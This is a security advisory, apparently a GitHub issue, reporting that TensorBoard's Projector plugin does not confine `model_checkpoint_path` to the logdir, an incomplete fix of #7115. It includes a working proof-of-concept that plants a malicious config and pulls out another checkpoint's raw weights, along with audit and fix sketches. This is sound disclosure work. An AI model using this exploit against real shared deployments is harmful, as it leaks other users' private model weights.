[Security] Incomplete fix of #7115: projector `model_checkpoint_path` is not confined to the logdir, allowing read and exfiltration of arbitrary TensorFlow checkpoints outside the logdir #7119

Reporting here as advised in https://issuetracker.google.com/issues/522459885

Package: tensorboard (PyPI), TensorBoard Projector plugin
Affected Versions: current main at commit deb522a (the #7115 fix), and all prior versions
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
CWE: CWE-22 Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)

### Summary

Commit deb522a ("Fix Projector Plugin vulnerability (#7115)") hardened the Projector plugin so that the user-controlled asset paths in `projector_config.pbtxt` (`metadata_path`, `tensor_path`, `bookmarks_path`, and `sprite.image_path`) are resolved against, and confined to, the directory that contains `projector_config.pbtxt`. The fix did not cover a fifth user-controlled path in the same config file: `model_checkpoint_path`. That field is still passed straight to `tf.train.load_checkpoint()` with no confinement check. An attacker who can write or influence a `projector_config.pbtxt` under a scanned logdir (the exact threat model the #7115 fix addresses) can point `model_checkpoint_path` at any TensorFlow checkpoint elsewhere on the host that the TensorBoard process can read. TensorBoard then enumerates that checkpoint's 2D variables, advertises them in the served config, and returns their raw tensor bytes through the `/data/plugin/projector/tensor` route. This discloses the contents of other users' or other tenants' private model checkpoints (the model weights), which on a shared training host or multi-tenant TensorBoard deployment is the most sensitive asset present.

### Details

The fix added `_rel_to_abs_asset_path()` (`tensorboard/plugins/projector/projector_plugin.py:212`), which resolves a candidate path and rejects it when it escapes the config directory:

```python
def _rel_to_abs_asset_path(fpath, config_fpath):
    config_dir = os.path.realpath(os.path.dirname(os.path.expanduser(config_fpath)))
    candidate = os.path.expanduser(fpath)
    if not os.path.isabs(candidate):
        candidate = os.path.join(config_dir, candidate)
    candidate = os.path.realpath(candidate)
    error_message = 'Asset path "%s" resolves outside the config directory' % (fpath)
    try:
        common_path = os.path.commonpath([config_dir, candidate])
    except ValueError as e:
        raise ValueError(error_message) from e
    if common_path != config_dir:
        raise ValueError(error_message)
    return candidate
```

The four patched fields route through this function: `tensor_path` (lines 380 and 680), `metadata_path` (line 620), `bookmarks_path` (line 752), and `sprite.image_path` (line 801). Pointing any of those at a path outside the config directory now returns a clean `400`.

`model_checkpoint_path` does not. It is read from the attacker-controlled config in `_read_latest_config_files()` (`text_format.Parse(file_content, config)`, line 457), checked only for existence with a glob, and then handed directly to the checkpoint reader in `_get_reader_for_run()`:

```python
# tensorboard/plugins/projector/projector_plugin.py
478    if (
479        config.model_checkpoint_path
480        and _using_tf()
481        and not tf.io.gfile.glob(config.model_checkpoint_path + "*")   # existence only
482    ):
...
498    if config.model_checkpoint_path and _using_tf():
499        try:
500            reader = tf.train.load_checkpoint(config.model_checkpoint_path)  # no confinement
```

There is no call to `_rel_to_abs_asset_path(config.model_checkpoint_path, ...)` anywhere, so the path is never confined to the config directory.

The readback is automatic and does not require the attacker to know any variable names. In `_augment_configs_with_checkpoint_info()` the reader enumerates every 2D variable in the target checkpoint and adds it to the served config:

```python
415    var_map = reader.get_variable_to_shape_map()
416    for tensor_name, tensor_shape in var_map.items():
417        if len(tensor_shape) != 2:
418            continue
...
425        embedding = config.embeddings.add()
426        embedding.tensor_name = tensor_name
```

That augmented config is returned by `/data/plugin/projector/config`. The client then requests each tensor, and `_serve_tensor()` returns the raw bytes:

```python
699    reader = self._get_reader_for_run(run)
...
709    tensor = reader.get_tensor(name)
...
719    data_bytes = tensor.tobytes()
720    return Respond(request, data_bytes, "application/octet-stream")
```

So the full chain is: the attacker plants a `projector_config.pbtxt` whose `model_checkpoint_path` points outside the logdir, the config endpoint discloses the variable names and shapes of that out-of-logdir checkpoint, and the tensor endpoint returns the raw weights. This is the same class of issue, in the same file and the same config message, that #7115 set out to close for the other path fields.

The read is constrained to valid TensorFlow checkpoint files (a non-checkpoint path such as `/etc/passwd` fails `load_checkpoint()` and the error is caught), so this is not an arbitrary file read. In TensorBoard's own domain that constraint still exposes the highest-value data on the host: trained model weights from other users' runs.
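
Because the malicious input is a plain-text config file, an operator can check an existing logdir for configs of this shape. The following is a minimal audit sketch, not part of TensorBoard: `find_escaping_configs()` and `escapes_config_dir()` are hypothetical names, the regex is a crude stand-in for the protobuf `text_format` parser the plugin actually uses, and relative values are resolved against the config directory (mirroring `_rel_to_abs_asset_path()`), which is an assumption about the intended semantics.

```python
import os
import re
import tempfile

# Crude matcher for a `model_checkpoint_path: "..."` line. The plugin parses
# the file with protobuf text_format; a regex is used here only to keep the
# sketch dependency-free. It ignores escapes, single quotes, and odd layouts.
_CKPT_RE = re.compile(r'^\s*model_checkpoint_path\s*:\s*"([^"]*)"', re.MULTILINE)


def escapes_config_dir(ckpt_path, config_fpath):
    """Return True if ckpt_path resolves outside the config file's directory."""
    config_dir = os.path.realpath(os.path.dirname(config_fpath))
    candidate = os.path.expanduser(ckpt_path)
    if not os.path.isabs(candidate):
        # Assumption: relative values are interpreted relative to the config dir.
        candidate = os.path.join(config_dir, candidate)
    candidate = os.path.realpath(candidate)
    try:
        return os.path.commonpath([config_dir, candidate]) != config_dir
    except ValueError:
        # Raised e.g. for paths on different drives: treat as escaping.
        return True


def find_escaping_configs(logdir):
    """Walk logdir and list (config file, checkpoint path) pairs that escape."""
    findings = []
    for root, _dirs, files in os.walk(logdir):
        if "projector_config.pbtxt" not in files:
            continue
        config_fpath = os.path.join(root, "projector_config.pbtxt")
        with open(config_fpath, "r", encoding="utf-8", errors="replace") as f:
            text = f.read()
        for ckpt_path in _CKPT_RE.findall(text):
            if escapes_config_dir(ckpt_path, config_fpath):
                findings.append((config_fpath, ckpt_path))
    return findings


# Demo on a throwaway directory tree: one benign config, one escaping config.
work = tempfile.mkdtemp(prefix="tb_audit_sketch_")
run_ok = os.path.join(work, "logdir", "run_ok")
run_bad = os.path.join(work, "logdir", "run_bad")
os.makedirs(run_ok)
os.makedirs(run_bad)
outside_ckpt = os.path.join(work, "victim_private", "model.ckpt")
with open(os.path.join(run_ok, "projector_config.pbtxt"), "w") as f:
    f.write('model_checkpoint_path: "model.ckpt"\n')
with open(os.path.join(run_bad, "projector_config.pbtxt"), "w") as f:
    f.write('model_checkpoint_path: "%s"\n' % outside_ckpt)

findings = find_escaping_configs(os.path.join(work, "logdir"))
for config_fpath, ckpt_path in findings:
    print("escapes config dir:", config_fpath, "->", ckpt_path)
```

A scan like this only reports what is on disk at the time it runs; it does not replace confining the path inside the plugin.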

### PoC

This reproduces against the real plugin code at commit deb522a. It writes a "victim" checkpoint outside the logdir, plants a malicious `projector_config.pbtxt` that points at it, and shows the weights coming back out of the tensor endpoint.

```
python3 -m venv tbvenv
./tbvenv/bin/pip install tensorflow-cpu werkzeug pillow grpcio-tools
# generate the plugin's protobuf modules in the checkout (run from the repo root):
./tbvenv/bin/python -m grpc_tools.protoc -I. --python_out=. $(find tensorboard -name '*.proto')
./tbvenv/bin/python poc_model_checkpoint_path.py
```

`poc_model_checkpoint_path.py`:

```python
import os, sys, json, tempfile
import numpy as np
sys.path.insert(0, ".")  # use this checkout
import tensorflow as tf
from werkzeug.test import Client
from tensorboard.plugins.projector import projector_plugin
from tensorboard.plugins import base_plugin

work = tempfile.mkdtemp(prefix="tb_poc_")

# Victim's PRIVATE checkpoint, OUTSIDE the shared logdir.
secret_dir = os.path.join(work, "victim_private", "secret_model")
os.makedirs(secret_dir)
SECRET = np.array([[1337.0, 7331.0, 4242.0],
                   [9001.0, 1234.0, 5678.0]], dtype=np.float32)
ckpt = tf.train.Checkpoint(stolen_weights=tf.Variable(SECRET, name="stolen_weights"))
prefix = ckpt.write(os.path.join(secret_dir, "model.ckpt"))

# Attacker controlled shared logdir: a malicious config that points outside it.
logdir = os.path.join(work, "shared_logdir")
os.makedirs(logdir)
with open(os.path.join(logdir, "projector_config.pbtxt"), "w") as f:
    f.write('model_checkpoint_path: "%s"\n' % prefix)
assert not os.path.realpath(prefix).startswith(os.path.realpath(logdir))

plugin = projector_plugin.ProjectorPlugin(
    base_plugin.TBContext(logdir=logdir, data_provider=None))

def get(handler, query):
    return Client(handler).get("/?" + query)

cfg = get(plugin._serve_config, "run=.").get_data(as_text=True)
name = json.loads(cfg)["embeddings"][0]["tensorName"]   # auto-discovered, no prior knowledge
data = get(plugin._serve_tensor, "run=.&name=%s" % name).get_data()
print("exfiltrated:", np.frombuffer(data, dtype=np.float32).tolist())
print("victim secret:", SECRET.flatten().tolist())
```

Observed output:

```
exfiltrated: [1337.0, 7331.0, 4242.0, 9001.0, 1234.0, 5678.0]
victim secret: [1337.0, 7331.0, 4242.0, 9001.0, 1234.0, 5678.0]
```

For contrast, calling the patched helper with the same out-of-logdir path is rejected:

```
_rel_to_abs_asset_path("/.../victim_private/secret_model/model.ckpt", "/.../shared_logdir/projector_config.pbtxt")
-> ValueError: Asset path "..." resolves outside the config directory
```

This confirms that the other four fields are confined while `model_checkpoint_path` is not.

### Impact

Information disclosure (CWE-22). An attacker who can write or influence a `projector_config.pbtxt` under a logdir that TensorBoard scans, which is the threat model the #7115 fix explicitly targets ("deployments where an attacker can write or influence projector_config.pbtxt contents under a scanned logdir"), can cause TensorBoard to read any TensorFlow checkpoint on the host that the TensorBoard process can access, and return its variable names, shapes, and raw weight tensors over HTTP. On a shared training host or a multi-tenant TensorBoard instance this exposes other users' private model weights. No TensorBoard credentials are required, and the attacker does not need to know any variable names in advance because the config endpoint enumerates them. The impact is confidentiality only; the target must be a valid TensorFlow checkpoint, so this is not an arbitrary file read. This is an incomplete fix of #7115 and should be closed the same way the four sibling fields were: by confining `model_checkpoint_path` to the config directory.
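
As a starting point for discussion, here is a minimal sketch of what that confinement could look like. It is not the maintainers' patch: `rel_to_abs_asset_path()` is a standalone copy of the helper quoted in Details (renamed so the snippet runs without TensorBoard), and `confined_checkpoint_path()` is a hypothetical wrapper. It assumes local filesystem paths only.

```python
import os
import tempfile


def rel_to_abs_asset_path(fpath, config_fpath):
    """Standalone copy of the `_rel_to_abs_asset_path()` logic quoted in Details."""
    config_dir = os.path.realpath(os.path.dirname(os.path.expanduser(config_fpath)))
    candidate = os.path.expanduser(fpath)
    if not os.path.isabs(candidate):
        candidate = os.path.join(config_dir, candidate)
    candidate = os.path.realpath(candidate)
    error_message = 'Asset path "%s" resolves outside the config directory' % (fpath)
    try:
        common_path = os.path.commonpath([config_dir, candidate])
    except ValueError as e:
        raise ValueError(error_message) from e
    if common_path != config_dir:
        raise ValueError(error_message)
    return candidate


def confined_checkpoint_path(model_checkpoint_path, config_fpath):
    """HYPOTHETICAL helper: return the confined checkpoint prefix, or None.

    A checkpoint path is a prefix (e.g. "model.ckpt"), not a single file, so
    the check is applied to the prefix itself. Returning None lets a caller
    skip loading the checkpoint; raising instead would be an equally valid
    design.
    """
    if not model_checkpoint_path:
        return None
    try:
        return rel_to_abs_asset_path(model_checkpoint_path, config_fpath)
    except ValueError:
        return None


# Demo on a throwaway directory tree.
work = tempfile.mkdtemp(prefix="tb_fix_sketch_")
logdir = os.path.join(work, "shared_logdir")
outside = os.path.join(work, "victim_private")
os.makedirs(logdir)
os.makedirs(outside)
config_fpath = os.path.join(logdir, "projector_config.pbtxt")

inside_result = confined_checkpoint_path("model.ckpt", config_fpath)
outside_result = confined_checkpoint_path(
    os.path.join(outside, "model.ckpt"), config_fpath
)
traversal_result = confined_checkpoint_path(
    "../victim_private/model.ckpt", config_fpath
)
print("inside:", inside_result)
print("absolute outside:", outside_result)
print("relative traversal:", traversal_result)
```

In the plugin, the confined value would presumably be what is passed to both the existence glob and `tf.train.load_checkpoint()`. One caveat: `os.path.realpath()` on the prefix does not resolve symlinks in the checkpoint's individual index and data files, so a complete fix may also need to consider those.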


